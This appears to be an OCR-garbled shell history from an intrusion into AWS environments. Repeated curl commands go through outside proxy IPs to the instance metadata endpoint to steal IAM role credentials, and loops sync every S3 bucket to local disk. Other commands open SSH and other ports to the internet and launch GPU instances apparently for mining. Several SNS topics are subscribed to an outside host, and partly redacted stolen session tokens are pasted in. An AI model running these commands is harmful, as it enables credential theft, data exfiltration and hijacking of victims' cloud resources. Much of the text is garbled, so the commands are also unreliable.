1089 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                          | awssession.sh
1091 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p
                                                                                            /{} '&&' cd
          /{} '&&' aws s3 sync s3://{} .
1092 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p "
                                                                                             '{}" '&&' cd
           /{}" '&&' aws s3 sync s3://{} .
1094 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
                                            /{}" '&&' aws s3 sync s3://{} .
\"service devops/{}\" '&&' cd \
1095 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p \"ec2 s3 role/{}\" '&&'
cd \
               /{}" '&&' aws s3 sync s3://{} .
1096 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
                                     /{}\" '&&' aws s3 sync s3://{} .
            /{}\" '&&' cd \
1098 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
           /$(echo {} '|' tr '\n' '_')\" '&&' cd \"
                                                              '$(echo {} '|' tr '\n' ' ')" '&&' aws s3
sync s3://{} .
1099 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
           /$(echo {} '|' tr \'\n\' \'_\')\" '&&' cd \"
                                                                 /$(echo {} '|' tr \'\n\' \' \')" '&&'
aws s3 sync s3://{} .
1101 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
                                                          $(echo {} \| tr \'\n\' \'_\')" '&&' aws
            '$(echo {} \| tr \'\n\' \'_\')\" '&&' cd \"
$5 SYIIC $5://{} .
1102 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
           /\$\(echo {} \| tr \'\n\' \' \'\)\" '&&' cd \
                                                                   /\$\(echo {} \| tr \'\n\' \' \')" '&&'
aws s3 sync s3://{}.
1105 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
           /\$(echo {} '|' tr \'\n\' \' \')\" '&&' cd \'
                                                                  /\$(echo {} '|' tr \'\n\' \' \')" '&&'
aws s3 sync s3://{} .
1106 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p '"
                                                                                              /{}"' '&&'
               /{}"' '&&' aws s3 sync s3://{} .
cd '
1113 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose mkdir -p
            /{}"' '&&' cd ' /{}"' '&&' aws s3 sync s3://{} .
1115 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"
\; mkdir -p '"$dir"' '&&' cd '"$dir"' '&&' aws s3 sync s3://{} .
1116 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"
```

```
\; mkdir -p '"${dir}"' '&&' cd '"${dir}"' '&&' aws s3 sync s3://{} .
                                                                                                     /{}"'
1117 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
\; mkdir -p '"${dir}"' '&&' cd '"${dir}"' '&&' pwd '&&' aws s3 sync s3://{} .
                                                                                                     /{}"'
1123 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
\; mkdir -p \'"$dir"\' '&&' cd \'"$dir"\' '&&' aws s3 sync s3://{} .
                                                                                                     /{}"'
1124 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
\; mkdir - p '"$\{dir\}"' '&&' cd '"$\{dir\}"' '&&' aws s3 sync s3://{} .
1125 cd /mnt/export/erratic/aws scan/
1126 cd /mnt/export/erratic/aws scan/
1129 /mnt/export/erratic/aws scan/
1130 /mnt/export/erratic/aws scan/
                                                                                                     /{}"'
1139 aws s3api list-buckets | jq -r '.Buckets | .|| | .Name' | parallel --verbose dir=''
\; mkdir - p \" {dir} \" '&&' cd \" {dir} \" '&&' aws s3 sync s3://{} .
1140 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                   /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
1148 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.239.113.195:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                             awssession.sh
1150 aws s3api list-bukets
1152 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.154.211.231:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
1154 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                                   "' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync
dir='
s3://{}}.
1156 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                          awssession.sh
1160 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.49.137:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                              l awssession.sh
1163 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.123.235:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
1164 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.123.235:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
1168 awssession.sh
1177 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
1179 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.230.94.207:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

```
awssession.sh
1181 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.230.94.207:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                            l awssession.sh
1185 grep -r "ami-id" | tr '.' ' | tr ':' ' | awk '{print $1"."$2"."$3"."$4":"$6}' | grep -v 443 |
parallel --tag --verbose curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://35.164.142.129:3128
http://
                              amazonaws.com/
.2.1.200624.0/lib/UserDataScript.sh
1186 <u>curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3128</u>
http://
                             .amazonaws.com/
.2.1.200624.0/lib/UserDataScript.sh
1187 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129
'https://
1188 curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129
1209
                       ~/aws scan
1210 aws sapi list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                   '{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
dir='"
1263 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.161.43.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                               | awssession.sh
1270 aws ec2 describe-instances --region us-east-1 > ../../
1271 aws ec2 describe-instances --region us-east-2 > ../../
1272 aws ec2 describe-instances --region us-west-1 > ../../
1273 aws ec2 describe-instances --region us-west-2 > ../../
1542 cp ../aws scan/scan for metadata.sh .
1543 ls ../../aws scan/
1544 cp ../aws scan/ports.txt .
1545 cp ../aws scan/https ports.txt .
1777 aws ec2 create-key-pair default2 --region us-west-2 --key-name default2
1778 aws ec2 create-key-pair --region us-west-2 --key-name default2
1779 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
               ∂e791 --associate-public-ip-address --security-group-idsaw :
ami-
                                                                                 0db7
--instance-initiated-shutdown-behavior terminate --key-name default2
```

```
1781 aws ec2 describe-instances --region us-west-2
1782 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami.
               0e791 --associate-public-ip-address --security-group-id sg-
                                                                               66a5
--instance-initiated-shutdown-behavior terminate --key-name default2
1797 aws ec2 create-key-pair --region ap-southeast-2 --key-name default
1801 aws ec2 run-instances --region ap-southeast-2 --instance-type t3.micro --count 1 --image-id
ami-
                 1423 --associate-public-ip-address --security-group-ids sg-
                                                                               20C5
--instance-initiated-shutdown-behavior terminate --key-name default
1803 aws ec2 describe-security-groups --region ap-southeast-2
1804 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 b0c5 --protocol tcp --port 22 --cidr
0.0.0.0/0 -- region ap-southeast-2
1834 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.203.180.4:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
                                                                                      awssession.sh
1836 aws ssm describe-activations
1837 aws ssm describe-instance-associations-status
1838 aws ssm describe-available-patches
1843 aws ec2 describe-instances --region us-east-1 >
1845 aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceType' | sort | uniq -c | sort -n
1846 aws ec2 create-key-pair --region eu-north-1 --key-name default
1847 aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
ami-
                 1423 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
1849 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.33.58.7:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                 awssession.sh
1851 aws ec2 describe-instances --region us-west-1
1852 aws s3 list-buckets
1855 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.233.67.216:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                l awssession.sh
                                                                                                     /{}"'
1857 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='"
\; mkdir - p \" {dir} \" '&&' cd \" {dir} \" '&&' aws s3 sync s3://{} .
1861 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.50.238:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                               awssession.sh
1863 aws describe-instances
1867 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.164.114.241:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                           awssession.sh
1869 awssession.sh
1879 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

```
1880 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
1883 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.199.114.150:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
1886 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.58.159.44:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                          awssession.sh
1891 aws ec2 describe-tags --region us-east-2 --filters "Name=resource-id, Values=i-
                                                                                                  593a"
1892 aws ec2 describe-tags --region us-east-2 --filters "Name=resource-id, Values=i-
                                                                                                  593a" >
1893 aws s3api --region us-east-1 list-buckets
1895 aws sns list-topics --region $S3 REGION | /usr/bin/jg -r ".Topics[] | select(.TopicArn).TopicArn"
grep $SNS TOPIC
1896 aws sns list-subscriptions --region $S3 REGION
1897 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                b0c5 --protocol tcp --port 1630 --cidr
0.0.0.0/0 --region ap-southeast-2
1899 sns topic arn=$(aws sns list-topics --region $S3 REGION | /usr/bin/jq -r ".Topics[] |
select(.TopicArn).TopicArn" | grep $SNS TOPIC)\n
1900 aws sns subscribe --region $S3 REGION --topic-arn $sns topic arn --protocol http
--notification-endpoint http://13.239.116.146:1630
1901 aws sns subscribe --region $S3 REGION --topic-arn
"arn:aws:sns:us-east-1:
                                                           --protocol http --notification-endpoint
http://13.239.116.146:1630
1902 aws sns subscribe --region $S3_REGION --topic-arn "arn:aws:sns:us-east
--protocol http --notification-endpoint http://13.239.116.146:1630
1912 aws s3 sync s3://
1949 aws s3api list-objects --bucket $BUCKET
2085 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://23.22.9.234:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                  | awssession.sh
2088 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                                                                 e8d7/{}"' \; mkdir -p \"$\{dir\}\" '&&'
dir='"
cd \" {dir} \" '&&' aws s3 sync s3://{} .
2089 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.204.53.206:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                      l awssession.sh
2093 aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | xargs -i -t aws ec2 describe-instance-attribute --instance-id {} --attribute userData
2132 mysql -u developer -h
                                                                           n
```

```
2148 curl
https://s3.
2162 curl
https://s3
2163 curl
https://s3.
2362 cd aws scan/
3386 curl https://ip-ranges.amazonaws.com/ip-ranges.json | json '.[]' | less
3387 curl "https://ip-ranges.amazonaws.com/ip-ranges.json" | json '.[]' | less
3388 curl https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[]' | less
3389 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[] | less
3390 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[]| ' | less
3391 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.[]' | less
3392 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] ' |
less
3393 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '' | less
3394 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2" | .ip_prefix) ' | less
3395 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jg '.prefixes | .[] |
select(.service == "EC2") ' | less
3396 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2" | .[]) ' | less
3397 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | |
select(.service == "EC2" | .[]) ' | less
3398 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes |
select(.service == "EC2" | .[]) ' | less
3399 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2") | .[] ' | less
3400 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes | .[] |
select(.service == "EC2") | .ip prefix ' | less
3401 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip prefix ' | less
 3483 less ~/.aws/credentials
3528 curl
https://s3.
3534 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.69.113.132.:3128
```

```
http://169.254.169.254/latest/meta-data/iam/security-credentials/
3535 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxv http://54.69.113.132.:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
3845 curl -vvv -L --proxy-insecure --proxy https://18.195.92.229:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                      | awssession.sh
     aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
dir='
                         /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
 3860 nslookup
3861 aws ec2 describe-instances --profile
 3862 aws ec2 --profile
                               describe-instances
                              describe-instances --region us-east-1
 3863 aws ec2 --profile
 3864 aws --profile
                              get-caller-identity
 3865 aws --profile
                              sts get-caller-identity
3866 aws --profile
                             ec2 create-key-pair --key-name default
 3867 aws --profile
                             ec2 create-key-pair --key-name default --region ap-northeast-1
3887 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.55.240.202:80
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/
awssession.sh
3910 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.51.130.133:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                      awssession.sh
 3914 aws ec2
 3919 cat ~/.local/bin/awssession.sh
3930 curl --proxy 52.55.240.202:80 -L -vvv
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/
awssession.sh
3935 aws ec2 --region us-east-1 describe-instances --instance-ids i-
                                                                                   8f91
 3936 aws
                         describe-stack-resource
 3937 aws
                         list-stacks
3938 aws ec2 --help
 3939 aws ec2 help
4161 aws ec2 describe instances --region ap-souteast-2
4162 aws ec2 describe instances --region ap-southeast-2
4163 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                  0c5 --protocol udp --port 514 --cidr
0.0.0.0/0 --region ap-southeast-2
4164 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                  0c5 --protocol udp --port 443 --cidr
0.0.0.0/0 --region ap-southeast-2
4167 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                  0c5 --protocol udp --port 42 --cidr
```

```
0.0.0.0/0 --region ap-southeast-2
4168 aws ec2 authorize-security-group-ingress --group-id sg-
                                                               b0c5 --protocol tcp --port 42 --cidr
0.0.0.0/0 -- region ap-southeast-2
4223 curl aws sts get-caller-identity
4228 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                                                          KV0K/{}"' \; mkdir -p \"$\{dir\}\" '&&' cd
dir='
\"{dir}\" '&&' aws s3 sync s3://{} .
4229 aws ec2 authorize-security-group-ingress --group-id sg- b641 --protocol tcp --port 22 --cidr
0.0.0.0/0
4233 curl --proxy-insecure --proxy https://52.198.201.173:443 -L
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                awssession.sh
4234 curl --proxy-insecure --proxy https://52.198.201.173:443 -L
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               awssession.sh export AWS SECRET ACCESS KEY="
                                                                                                 JG3Ha"
4238 aws ec2 create-key-pair --region eu-west-1
4241 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 af30 --protocol tcp --port 22 --cidr
0.0.0.0/0
4242 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 af30 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
4243 aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 3 --image-id
                 la80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate
4244 aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 3 --image-id
                4a80 --associate-public-ip-address --security-group-ids sg-
ami
--instance-initiated-shutdown-behavior terminate
4245 aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami
                34a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate
4246 aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 3 --image-id
                4a80 --associate-public-ip-address --security-group-ids sg-
ami-
--inscance-iniciated-shutdown-behavior terminate
4247 aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg-
ami-
                                                                               af30
--instance-initiated-shutdown-behavior terminate
                                    describe-instances --region us-west-2 | jq -r '.Reservations | .[] |
4248 aws --profile
.Instances | .[] | .PublicIpAddress'
4255 aws sts get-caller-identityy
4256 aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
```

```
.InstanceId' | tr '\n' ' '
4257 aws ec2 terminate-instances --region-eu-west-1 --instance-ids i-
                                                                                    282a
i-(
              2e5f i-
                                   552d i-
                                                       cfb9 i-
                                                                                               99bb
                                                                           a945 i-
4258 aws ec2 terminate-instances --region eu-west-1 --instance-ids i-
                                                                                    282a
              2e5f i-
                                   552d i-
                                                       cfb9 i-
                                                                           a945 i-
                                                                                                9bb1
4259 dws ecz describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | xargs -i -t aws ec2 terminate-instances --region-eu-west-1 --instance-ids {}
4260 aws ec2 delete-key-pair --region eu-west-1 --key-name default
4261 aws ec2 create-key-pair --region eu-west-1 --key-name default
4266 aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg 3f30
--instance-initiated-shutdown-behavior terminate
4267 aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | xargs -i -t aws ec2 terminate-instances --region eu-west-1 --instance-ids {}
4268 aws ec2 describe-instances --region eu-west-1 | less
4269 aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
4270 aws ec2 run-instances --region eu-west-1 --instance-type p3.2xlarge --count 2 --image-id
ami-
                 4a80 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
4271 aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate --key-name default
4272 aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
4286 curl --proxy http://63.35.93.108:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
4288 curl --proxy http://52.7.126.48:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
4291 curl --proxy http://52.7.126.48:8888
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                          awssession.sh
4293 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
                            /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{} .
dir=''
4294 cd aws scan/metadata-remote
4302 curl -L --proxy http://52.83.253.74:3128
                                                                                    | awssession.sh
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```

```
4311 curl --proxy-insecure --proxy https://34.249.66.243:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
4315 curl --proxy-insecure --proxy 52.65.90.185:443
                                                                     | awssession.sh
http://169.254.169.254/latest/meta-data/iam/security-credentials/
4323 curl -Lsk --fail --proxy-insecure --proxy https://52.65.90.185:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                     | awssession.sh
4328 curl -Lsk --fail --proxy-insecure --proxy https://34.195.6.247:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                  l awssession.sh
4426 echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-03-22T10:03:37Z",\n "Type" : "
                                                                                                     ',\n
"AccessKeyId" : "
                                276W",\n "SecretAccessKey":
                                    GSdK",\n "Token":
"FOOGZXIvYXdzEPP///////wEaDP300E/t0/YXpvvmrSLBA0xq0wwZfepTLSOsRuT54lE1r8Bduf1P4i21CwiznOikvJaF7Dem6/Cyb/
C7webUgjgXUqEbYoxeB2RuZ0q8mMFJxEknSAg5WpWw9M+nblE8YTimsdHwHwsW9dV/7DrlVBTiuOMBlox/MOwIAojh4ppWt6omq9OZwhXWq
DETiIg8aIFes24wguYXxkuXSrk1Y6uVUFXWPLGTSYiPU82Lp8ARyf9sfCxlhrAqlqUDaQOqgT+d6wnd/bkbgSj/eJp1lzH09HDhh48rjdFH
jbtJ+vnrR3NoBtUPFpcWkwbb00ySKGaq6RKGOmwFKTCMZd5H8eI1OjHIN1/pDRw7gy8S2cO6RSBJp++FwwviOCIz86rV9eKV8lqwhxrT+yB
Bc2MW/K9DIJFEtm5wg1XbQI4c7A5uSIAxg3lVL3Nd0x/TU54eLhXKXO6zqwiLZLChHJD7yY00ZnjBpvnZy+4PUZEscdwl04G6bS6br/QA0E
1Ms3khSvcR3zikZu1zK1bBClrd4rOviBGz126qe3NeCbTok/cCnocYPDUyqAGVzxSbEY6tx3VfoRY4QVvA6rA4r5Sa1gZRprceU9MuAAlXC
z809jFxKIPm0uQF",\n "Expiration": "2019-03-22T16:20:46Z"\n}' | awssession.sh
4428 aws sts get-caller-identiy
      aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose
4429
                               {}"' \; mkdir -p \"$\{dir\}\" '&&' cd \"$\{dir\}\" '&&' aws s3 sync s3://{}
dir='
4451 echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-03-22T11:03:58Z",\n "Type" :
                                                                                                      ',\n
"AccessKeyId" : "
                                NTUB",\n "SecretAccessKey" :
                                    IUEo",\n "Token" :
"FQoGZXIvYXdzEPT///////wEaDFcw0apGj9mT+DxT5iLBA8XIF8YHtV7GznJCfWAMAYWfCvHnt+IqPQYWUBtT5eWgBNHS5HVVybV/Iu
m4r/01PhoxfNdYmdJsiS04M+s20VofU59ki5qZcYpEZtrs2ax6DOwdp30jiP8n4KUMSNO9meT1QgyoSvq5Cbe5PLx3jgkfHbd5N34eP3IsC
gdqzdR5v+AnnXB6xJNS31MKa73uPQyjCHAXQ79A5tSywv1Qp22q/hxYnkPg2VDyaC3BdhXgingT7ArrF0ZBS6YjHMeGrHJmGWd6X+gsp3b9
PyysRUT17pv4C1L6x2RcTxJK7w/ypCmksTm0fgrdRbUcwlrA4PB4L0kmolwy8Vt3jIeuLPf0xNIdlY4LVMNOXaY8Ti2XHbzcM8ge02I19Ta
ORHWCS1jXOCinpcO4jhCLkVPR6Ba64yFT4lh59jxGx90uz7uW/ZzvOJYKh7DA4r4wJIESaXNcBW437ctGMdwVY/6GSur4k43On54gcnVfpL
6yDt7xPwLB9sB8Nriy1UadH10CysxreZZ9QSXNTlDiYvZQIVDGWo5PlcwNwYWU+TdjasX81BM7qYZxsuAITh1we+QAzSopupdCOstDEYd4B
AifLmoaKJOC0+QF",\n "Expiration": "2019-03-22T17:18:40Z"\n}' | awssession.sh
4453 aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
.Tags'
4454 aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
[.PublicIpAddress, .Tags]' | less
4457 aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
[.PublicIpAddress, .PrivateIpAddress, .Tags]' | less
```

```
4458 aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
4459 aws ec2 describe-instances --region ap-northeast-1 | jg -r '.Reservations | .[] | .Instances | .[]
' | less
4469 aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| .PrivateIpAddress' | less
4470 aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
| .PrivateIpAddress' | parallel curl
4471 aws ec2 describe-instances --region ap-northeast-1 | jq -r '.Reservations | .[] | .Instances | .[]
PrivateIpAddress' | parallel curl -Lsk --fail --proxy-insecure --proxy http://54.249.29.154:80
http://{}:9000
4480 curl -Lsk --fail --proxy-insecure --proxy https://34.234.188.25:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                              | awsession.sh
4485 less awscli.conf
4524 aws organizations
 4525 aws organizations help
 4526 less
                                                /Unsaved/2018/09/17/
./
 4527 less
 4618 less
 4619 less
4644 aws s3api sync
 4645 aws s3 sync
 4646 aws s3 sync --help
4647 aws s3 sync
 4648 aws s3 sync help
4657 echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-03-22T17:07:39Z",\n "Type" : "
                                                                                                    ",\n
"AccessKevId" : "/
                                5KNF",\n "SecretAccessKey":
                                    PNOa",\n "Token":
"FQoGZXIvYXdzEPv//////wEaD0610tGs+VmBMYgRfiK9A0YN+3CnnnDF2jhOCkrSS5CRUCpolcqx/Ihn1YD4FP2rtAG0YujOhBQM4c
Pt0IB8N0sXu/wGMfWJ8k4JPFe8Pvr3oPH9dvaX5bgml0gvZ2Y6I8Ulh7+xtScEpNS88ikNBgf9UIouOcW+s4omAfmM+ffzd489SHoUySujg
pyP+FDor09EoQZxxcvonBXSmXNk6vScIMVRqoVmV8621M4iEzZWKDmLMGlWi9Sa/G2QUZoz2ekgIMH2sRXkDIlUqd/TgcI6T61sm2YeRgct
pb1gazvgt8kofOqsU+DoXrymrI2N6U/VU54PdWlWUEkBRgSmToQa9hvTD9rNwDwrwwXSEABACx4NHRBp9v/F26n7K4y4YvqLiBWLSVCvsF2
VJcJo7oqVotefr41FeBlXRWif/n26abhdE4pacHGPSsTZLdD/ihzfvxqqjaus8U2siIeeE0iEr9VakH9QOr+WfZAiCaN5IUQXHbmt40NGB1
f++4b7EUy9IztVftaxOijHJKXlPSHRLgl4MTK2DcRDpPrTmx/ojG2N0Qcj+ThhQTnTZGgPjqs1r2M4ry6VUTHtsaG7q/aKLGAuHKporX6Um
zYo1KzU5AU=",\n "Expiration": "2019-03-22T23:40:17Z"\n}' | awssession.sh
```

```
4662 aws ec2 describe-instances --region eu-central-1
4663 aws ec2 describe-instances --region eu-central-1 | less
